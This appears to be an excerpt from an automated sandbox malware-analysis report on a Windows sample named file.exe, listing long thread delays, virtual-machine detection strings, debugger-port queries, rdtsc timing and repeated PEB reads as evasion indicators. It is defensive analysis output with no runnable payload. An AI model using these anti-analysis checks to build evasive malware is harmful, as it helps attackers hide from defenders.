Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -95735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -95610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -95335s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -95205s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -95078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -94969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -94860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6540	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 99657	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 99532	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 99407	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 99282	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 99172	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 99062	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 98953	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 98844	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 98733	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 98625	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 98516	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 98405	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 98297	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 98188	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 98071	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 97932	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 97828	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 97719	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 97594	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 97485	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 97360	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 97235	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 97110	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 96985	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 96860	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 96735	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 96610	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 96485	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 96360	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 96235	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 96110	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 95985	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 95860	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 95735	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 95610	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 95335	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 95205	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 95078	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 94969	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 94860	Jump to behavior

Source: file.exe, 00000000.00000002.2111813386.000000000274A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: file.exe, 00000000.00000002.2111813386.000000000274A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: file.exe, 00000000.00000002.2110427135.00000000008FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_0169096E rdtsc

2_2_0169096E

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_00417983 LdrLoadDll,

2_2_00417983

Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E4144 mov eax, dword ptr fs:[00000030h]	2_2_016E4144
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E4144 mov eax, dword ptr fs:[00000030h]	2_2_016E4144
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E4144 mov ecx, dword ptr fs:[00000030h]	2_2_016E4144
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E4144 mov eax, dword ptr fs:[00000030h]	2_2_016E4144
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E4144 mov eax, dword ptr fs:[00000030h]	2_2_016E4144
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01656154 mov eax, dword ptr fs:[00000030h]	2_2_01656154
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01656154 mov eax, dword ptr fs:[00000030h]	2_2_01656154
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164C156 mov eax, dword ptr fs:[00000030h]	2_2_0164C156
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E8158 mov eax, dword ptr fs:[00000030h]	2_2_016E8158
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01680124 mov eax, dword ptr fs:[00000030h]	2_2_01680124
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FE10E mov eax, dword ptr fs:[00000030h]	2_2_016FE10E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FE10E mov ecx, dword ptr fs:[00000030h]	2_2_016FE10E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FE10E mov eax, dword ptr fs:[00000030h]	2_2_016FE10E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FE10E mov eax, dword ptr fs:[00000030h]	2_2_016FE10E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FE10E mov ecx, dword ptr fs:[00000030h]	2_2_016FE10E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FE10E mov eax, dword ptr fs:[00000030h]	2_2_016FE10E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FE10E mov eax, dword ptr fs:[00000030h]	2_2_016FE10E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FE10E mov ecx, dword ptr fs:[00000030h]	2_2_016FE10E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FE10E mov eax, dword ptr fs:[00000030h]	2_2_016FE10E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FE10E mov ecx, dword ptr fs:[00000030h]	2_2_016FE10E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01710115 mov eax, dword ptr fs:[00000030h]	2_2_01710115
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FA118 mov ecx, dword ptr fs:[00000030h]	2_2_016FA118
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FA118 mov eax, dword ptr fs:[00000030h]	2_2_016FA118
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FA118 mov eax, dword ptr fs:[00000030h]	2_2_016FA118
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FA118 mov eax, dword ptr fs:[00000030h]	2_2_016FA118
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016801F8 mov eax, dword ptr fs:[00000030h]	2_2_016801F8
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_017261E5 mov eax, dword ptr fs:[00000030h]	2_2_017261E5
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_017161C3 mov eax, dword ptr fs:[00000030h]	2_2_017161C3
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_017161C3 mov eax, dword ptr fs:[00000030h]	2_2_017161C3
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CE1D0 mov eax, dword ptr fs:[00000030h]	2_2_016CE1D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CE1D0 mov eax, dword ptr fs:[00000030h]	2_2_016CE1D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_016CE1D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CE1D0 mov eax, dword ptr fs:[00000030h]	2_2_016CE1D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CE1D0 mov eax, dword ptr fs:[00000030h]	2_2_016CE1D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01690185 mov eax, dword ptr fs:[00000030h]	2_2_01690185
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F4180 mov eax, dword ptr fs:[00000030h]	2_2_016F4180
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F4180 mov eax, dword ptr fs:[00000030h]	2_2_016F4180
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D019F mov eax, dword ptr fs:[00000030h]	2_2_016D019F
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D019F mov eax, dword ptr fs:[00000030h]	2_2_016D019F
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D019F mov eax, dword ptr fs:[00000030h]	2_2_016D019F
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D019F mov eax, dword ptr fs:[00000030h]	2_2_016D019F
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164A197 mov eax, dword ptr fs:[00000030h]	2_2_0164A197
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164A197 mov eax, dword ptr fs:[00000030h]	2_2_0164A197
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164A197 mov eax, dword ptr fs:[00000030h]	2_2_0164A197
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0170C188 mov eax, dword ptr fs:[00000030h]	2_2_0170C188
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0170C188 mov eax, dword ptr fs:[00000030h]	2_2_0170C188
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167C073 mov eax, dword ptr fs:[00000030h]	2_2_0167C073
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01652050 mov eax, dword ptr fs:[00000030h]	2_2_01652050
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D6050 mov eax, dword ptr fs:[00000030h]	2_2_016D6050
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164A020 mov eax, dword ptr fs:[00000030h]	2_2_0164A020
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164C020 mov eax, dword ptr fs:[00000030h]	2_2_0164C020
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E6030 mov eax, dword ptr fs:[00000030h]	2_2_016E6030
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D4000 mov ecx, dword ptr fs:[00000030h]	2_2_016D4000
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F2000 mov eax, dword ptr fs:[00000030h]	2_2_016F2000
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F2000 mov eax, dword ptr fs:[00000030h]	2_2_016F2000
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F2000 mov eax, dword ptr fs:[00000030h]	2_2_016F2000
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F2000 mov eax, dword ptr fs:[00000030h]	2_2_016F2000
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F2000 mov eax, dword ptr fs:[00000030h]	2_2_016F2000
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F2000 mov eax, dword ptr fs:[00000030h]	2_2_016F2000
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F2000 mov eax, dword ptr fs:[00000030h]	2_2_016F2000
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F2000 mov eax, dword ptr fs:[00000030h]	2_2_016F2000
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166E016 mov eax, dword ptr fs:[00000030h]	2_2_0166E016
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166E016 mov eax, dword ptr fs:[00000030h]	2_2_0166E016
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166E016 mov eax, dword ptr fs:[00000030h]	2_2_0166E016
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166E016 mov eax, dword ptr fs:[00000030h]	2_2_0166E016
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0164A0E3
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016580E9 mov eax, dword ptr fs:[00000030h]	2_2_016580E9
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D60E0 mov eax, dword ptr fs:[00000030h]	2_2_016D60E0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0164C0F0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016920F0 mov ecx, dword ptr fs:[00000030h]	2_2_016920F0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D20DE mov eax, dword ptr fs:[00000030h]	2_2_016D20DE
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E80A8 mov eax, dword ptr fs:[00000030h]	2_2_016E80A8
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_017160B8 mov eax, dword ptr fs:[00000030h]	2_2_017160B8
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_017160B8 mov ecx, dword ptr fs:[00000030h]	2_2_017160B8
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165208A mov eax, dword ptr fs:[00000030h]	2_2_0165208A
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F437C mov eax, dword ptr fs:[00000030h]	2_2_016F437C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0171A352 mov eax, dword ptr fs:[00000030h]	2_2_0171A352
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]	2_2_016D2349
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]	2_2_016D2349
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]	2_2_016D2349
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]	2_2_016D2349
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]	2_2_016D2349
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]	2_2_016D2349
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]	2_2_016D2349
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]	2_2_016D2349
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]	2_2_016D2349
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]	2_2_016D2349
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]	2_2_016D2349
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]	2_2_016D2349
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]	2_2_016D2349
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]	2_2_016D2349
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]	2_2_016D2349
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D035C mov eax, dword ptr fs:[00000030h]	2_2_016D035C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D035C mov eax, dword ptr fs:[00000030h]	2_2_016D035C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D035C mov eax, dword ptr fs:[00000030h]	2_2_016D035C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D035C mov ecx, dword ptr fs:[00000030h]	2_2_016D035C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D035C mov eax, dword ptr fs:[00000030h]	2_2_016D035C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D035C mov eax, dword ptr fs:[00000030h]	2_2_016D035C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F8350 mov ecx, dword ptr fs:[00000030h]	2_2_016F8350
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168A30B mov eax, dword ptr fs:[00000030h]	2_2_0168A30B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168A30B mov eax, dword ptr fs:[00000030h]	2_2_0168A30B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168A30B mov eax, dword ptr fs:[00000030h]	2_2_0168A30B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164C310 mov ecx, dword ptr fs:[00000030h]	2_2_0164C310
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01670310 mov ecx, dword ptr fs:[00000030h]	2_2_01670310
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016603E9 mov eax, dword ptr fs:[00000030h]	2_2_016603E9
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016603E9 mov eax, dword ptr fs:[00000030h]	2_2_016603E9
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016603E9 mov eax, dword ptr fs:[00000030h]	2_2_016603E9
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016603E9 mov eax, dword ptr fs:[00000030h]	2_2_016603E9
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016603E9 mov eax, dword ptr fs:[00000030h]	2_2_016603E9
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016603E9 mov eax, dword ptr fs:[00000030h]	2_2_016603E9
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016603E9 mov eax, dword ptr fs:[00000030h]	2_2_016603E9
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016603E9 mov eax, dword ptr fs:[00000030h]	2_2_016603E9
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0166E3F0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0166E3F0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0166E3F0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016863FF mov eax, dword ptr fs:[00000030h]	2_2_016863FF
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0165A3C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0165A3C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0165A3C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0165A3C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0165A3C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0165A3C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016583C0 mov eax, dword ptr fs:[00000030h]	2_2_016583C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016583C0 mov eax, dword ptr fs:[00000030h]	2_2_016583C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016583C0 mov eax, dword ptr fs:[00000030h]	2_2_016583C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016583C0 mov eax, dword ptr fs:[00000030h]	2_2_016583C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D63C0 mov eax, dword ptr fs:[00000030h]	2_2_016D63C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FE3DB mov eax, dword ptr fs:[00000030h]	2_2_016FE3DB
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FE3DB mov eax, dword ptr fs:[00000030h]	2_2_016FE3DB
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FE3DB mov ecx, dword ptr fs:[00000030h]	2_2_016FE3DB
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FE3DB mov eax, dword ptr fs:[00000030h]	2_2_016FE3DB
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F43D4 mov eax, dword ptr fs:[00000030h]	2_2_016F43D4
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F43D4 mov eax, dword ptr fs:[00000030h]	2_2_016F43D4
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0170C3CD mov eax, dword ptr fs:[00000030h]	2_2_0170C3CD
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167438F mov eax, dword ptr fs:[00000030h]	2_2_0167438F
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167438F mov eax, dword ptr fs:[00000030h]	2_2_0167438F
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164E388 mov eax, dword ptr fs:[00000030h]	2_2_0164E388
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164E388 mov eax, dword ptr fs:[00000030h]	2_2_0164E388
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164E388 mov eax, dword ptr fs:[00000030h]	2_2_0164E388
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01648397 mov eax, dword ptr fs:[00000030h]	2_2_01648397
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01648397 mov eax, dword ptr fs:[00000030h]	2_2_01648397
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01648397 mov eax, dword ptr fs:[00000030h]	2_2_01648397
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]	2_2_01700274
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]	2_2_01700274
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]	2_2_01700274
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]	2_2_01700274
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]	2_2_01700274
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]	2_2_01700274
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]	2_2_01700274
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]	2_2_01700274
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]	2_2_01700274
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]	2_2_01700274
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]	2_2_01700274
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]	2_2_01700274
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01654260 mov eax, dword ptr fs:[00000030h]	2_2_01654260
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01654260 mov eax, dword ptr fs:[00000030h]	2_2_01654260
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01654260 mov eax, dword ptr fs:[00000030h]	2_2_01654260
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164826B mov eax, dword ptr fs:[00000030h]	2_2_0164826B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0170A250 mov eax, dword ptr fs:[00000030h]	2_2_0170A250
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0170A250 mov eax, dword ptr fs:[00000030h]	2_2_0170A250
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D8243 mov eax, dword ptr fs:[00000030h]	2_2_016D8243
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D8243 mov ecx, dword ptr fs:[00000030h]	2_2_016D8243
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164A250 mov eax, dword ptr fs:[00000030h]	2_2_0164A250
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01656259 mov eax, dword ptr fs:[00000030h]	2_2_01656259
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164823B mov eax, dword ptr fs:[00000030h]	2_2_0164823B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016602E1 mov eax, dword ptr fs:[00000030h]	2_2_016602E1
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016602E1 mov eax, dword ptr fs:[00000030h]	2_2_016602E1
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016602E1 mov eax, dword ptr fs:[00000030h]	2_2_016602E1
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0165A2C3
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0165A2C3
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0165A2C3
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0165A2C3
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0165A2C3
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016602A0 mov eax, dword ptr fs:[00000030h]	2_2_016602A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016602A0 mov eax, dword ptr fs:[00000030h]	2_2_016602A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E62A0 mov eax, dword ptr fs:[00000030h]	2_2_016E62A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E62A0 mov ecx, dword ptr fs:[00000030h]	2_2_016E62A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E62A0 mov eax, dword ptr fs:[00000030h]	2_2_016E62A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E62A0 mov eax, dword ptr fs:[00000030h]	2_2_016E62A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E62A0 mov eax, dword ptr fs:[00000030h]	2_2_016E62A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E62A0 mov eax, dword ptr fs:[00000030h]	2_2_016E62A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168E284 mov eax, dword ptr fs:[00000030h]	2_2_0168E284
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168E284 mov eax, dword ptr fs:[00000030h]	2_2_0168E284
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D0283 mov eax, dword ptr fs:[00000030h]	2_2_016D0283
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D0283 mov eax, dword ptr fs:[00000030h]	2_2_016D0283
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D0283 mov eax, dword ptr fs:[00000030h]	2_2_016D0283
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168656A mov eax, dword ptr fs:[00000030h]	2_2_0168656A
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168656A mov eax, dword ptr fs:[00000030h]	2_2_0168656A
